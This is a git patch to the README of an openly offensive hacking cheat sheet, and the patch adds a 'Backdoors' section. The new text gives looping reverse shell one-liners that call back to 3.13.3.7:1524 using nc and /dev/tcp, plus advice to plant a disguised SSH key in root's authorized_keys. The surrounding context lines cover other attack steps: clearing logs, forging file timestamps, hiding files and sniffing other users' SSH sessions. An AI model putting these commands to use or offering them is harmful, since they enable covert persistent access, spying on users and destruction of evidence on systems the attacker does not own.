From d134ea846199b2c27865080e229c3daf2d9b7b64 Mon Sep 17 00:00:00 2001
From: rootTHC <57636391+rootTHC@users.noreply.github.com>
Date: Sat, 25 Jan 2020 16:02:56 +0000
Subject: [PATCH] Update README.md

authorized key backdoor.
---
 README.md | 66 ++++++++++++++++++++++++++++++++++++++++++-------------
 1 file changed, 51 insertions(+), 15 deletions(-)

diff --git a/README.md b/README.md
index af40c3f..3bb4577 100644
--- a/README.md
+++ b/README.md
@@ -40,17 +40,20 @@ Got tricks? Send them to root@thc.org or submit a pull request.
       1. [Upgrade a reverse shell to a pty shell](#rsup-anchor)
       1. [Upgrade a reverse shell to a fully interactive shell](#rsup2-anchor)
       1. [Reverse shell with socat (fully interactive)](#rssc-anchor)
- 6. [Shell Hacks](#sh-anchor)
+ 6. [Backdoors](#bd-anchor)
+    1. [Background reverse shell](#bdrs-anchor)
+    1. [authorized_keys](#bdak-anchor)
+ 7. [Shell Hacks](#sh-anchor)
     1. [Shred files (secure delete)](#shsf-anchor)
     1. [Shred files without *shred*](#shsfwo-anchor)
     1. [Restore the date of a file](#shrdf-anchor)
     1. [Clean logfile](#shcl-anchor)
     1. [Hide files from a User without root priviledges](#shhu-anchor)
- 7. [Crypto](#cr-anchor)
+ 8. [Crypto](#cr-anchor)
     1. [Generate quick random Password](#crgrp-anchor)
     1. [Linux transportable encrypted filesystems](#crltefs-anchor)
     1. [Encrypting a file](#cref-anchor)
- 8. [Miscellaneous](#misc-anchor)
+ 9. [Miscellaneous](#misc-anchor)
     1. [Sniff a user's SSH session](#sss-anchor)
     1. [Sniff a user's SSH session without root priviledges](#ssswor-anchor)
     1. [How to survive high latency connections](#hlc-anchor)
@@ -427,17 +430,51 @@ socat file:`tty`,raw,echo=0 tcp-listen:1524
 socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:3.13.3.7:1524
 ```
 
+---
+<a id="bd-anchor"></a>
+<a id="bdrs-anchor"></a>
+**6.i. Background reverse shell**
+
+A reverse shell that keeps trying to connect back to us every 3600 seconds (indefinately). Often used until a real backdoor has been deployed. Add to */etc/rc.local* if required...
+
+```
+$ (while :; do nc -e /bin/bash -vn 3.13.3.7 1524; sleep 3600; done ) &>/dev/null &
+```
+
+Or
+```
+$ screen -d -m /bin/bash -c 'while :; do bash -i 2>&1 >&/dev/tcp/3.13.3.7/1524 0>&1; sleep 3600; done'
+```
+
+<a id="bdak-anchor"></a>
+**6.ii. authorized_keys**
+
+Add your ssh public key to */root/.ssh/authorized_keys*. It's the most reliable backdoor ever :>
+
+* It survives reboots.
+* It even survives re-installs. Admins have been known to make a backup of authorized_keys and then put it straight back onto the newly installed system.
+* We have even seen our key being copied to other companies!
+
+Tip: Change the name at the end of the ssh public keyfile to something obscure like *backup@ubuntu* or the admin's real name:
+```
+$ cat id_rsa.pub
+ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCktFkgm40GDkqYwJkNZVb+NLqYoUNSPVPLx0VDbJM0
+[...]
+u1i+MhhnCQxyBZbrWkFWyzEmmHjZdAZCK05FRXYZRI9yadmvo7QKtRmliqABMU9WGy210PTOLMltbt2C
+c3zxLNse/xg0CC16elJpt7IqCFV19AqfHnK4YiXwVJ+M+PyAp/aEAujtHDHp backup@ubuntu
+```
+
 ---
 <a id="sh-anchor"></a>
 <a id="shsf-anchor"></a>
-**6.i. Shred & Erase a file**
+**7.i. Shred & Erase a file**
 
 ```
 $ shred -z foobar.txt
 ```
 
 <a id="shsfwo-anchor"></a>
-**6.ii. Shred & Erase without *shred***
+**7.ii. Shred & Erase without *shred***
 ```
 $ FN=foobar.txt; dd bs=1k count="`du -sk \"${FN}\" | cut -f1`" if=/dev/urandom >"${FN}"; rm -f "${FN}"
 ```
@@ -446,7 +483,7 @@ Note: Or deploy your files in */dev/shm* directory so that no data is written to
 Note: Or delete the file and then fill the entire harddrive with /dev/urandom and then rm -rf the dump file.
 
 <a id="shrdf-anchor"></a>
-**6.iii. Restore the date of a file**
+**7.iii. Restore the date of a file**
 
 Let's say you have modified */etc/passwd* but the file date now shows that */etc/passwd* has been modifed. Use *touch* to change the file data to the date of another file (in this example, */etc/shadow*)
 
@@ -455,7 +492,7 @@ $ touch -r /etc/shadow /etc/passwd
 ```
 
 <a id="shcl-anchor"></a>
-**6.iv. Clear logfile**
+**7.iv. Clear logfile**
 
 This will reset the logfile to 0 without having to restart syslogd etc:
 ```
@@ -469,7 +506,7 @@ This will remove any sign of us from the log file:
 ```
 
 <a id="shhu-anchor"></a>
-**6.v. Hide files from that User without root priviledges**
+**7.v. Hide files from that User without root priviledges**
 
 Our favorite working directory is */dev/shm/*. This location is volatile memory and will be lost on reboot. NO LOGZ == NO CRIME.
 
@@ -498,7 +535,7 @@ $ cd $'\t'
 
 <a id="cr-anchor"></a>
 <a id="crgrp-anchor"></a>
-**7.i. Generate quick random Password**
+**8.i. Generate quick random Password**
 
 Good for quick passwords without human element.
 
@@ -507,7 +544,7 @@ $ openssl rand -base64 24
 ```
 
 <a id="crltefs-anchor"></a>
-**7.ii. Linux transportable encrypted filesystems**
+**8.ii. Linux transportable encrypted filesystems**
 
 Create a 256MB large encrypted file system. You will be prompted for a password.
 
@@ -535,7 +572,7 @@ Store data in `/mnt/crypted`, then unmount:
 ```
 
 <a id="misc-anchor"></a>
-**7.iii Encrypting a file**
+**8.iii Encrypting a file**
 
 Encrypt your 0-Days and log files before transfering them - please. (and pick your own password):
 
@@ -552,14 +589,14 @@ $ openssl enc -d -aes-256-cbc -pbkdf2 -k fOUGsg1BJdXPt0CY4I <input.txt.enc >inpu
 ---
 <a id="misc-anchor"></a>
 <a id="sss-anchor"></a>
-**8.i. Sniff a user's SSH session**
+**9.i. Sniff a user's SSH session**
 ```
 $ strace -e trace=read -p <PID> 2>&1 | while read x; do echo "$x" | grep '^read.*= [1-9]$' | cut -f2 -d\"; done
 ```
 Dirty way to monitor a user who is using *ssh* to connect to another host from a computer that you control.
 
 <a id="ssswor-anchor"></a>
-**8.ii. Sniff a user's SSH session without root priviledges**
+**9.ii. Sniff a user's SSH session without root priviledges**
 
 Even dirtier way in case */proc/sys/kernel/yama/ptrace_scope* is set to 1 (strace will fail on already running SSH clients unless uid=0)
 
@@ -594,7 +631,7 @@ $ chmod 755 ~/.local/bin/ssh ~/.local/bin/ssh-log
 The SSH session will be sniffed and logged to *~/.ssh/logs/* the next time the user logs into his shell and uses SSH.
 
 <a id="hlc-anchor"></a>
-**8.iii. How to survive high latency connections**
+**9.iii. How to survive high latency connections**
 
 Hacking over long latency links or slow links can be frustrating. Every keystroke is transmitted one by one and any typo becomes so much more frustrating and time consuming to undo. *rlwrap* comes to the rescue. It buffers all single keystrokes until *Enter* is hit and then transmits the entire line at once. This makes it so much easier to type at high speed, correct typos, ...
 
@@ -608,6 +645,5 @@ Example for *SSH*:
 $ rlwrap ssh user@host
 ```
 
-
 ---
 Shoutz: ADM, Oscar2020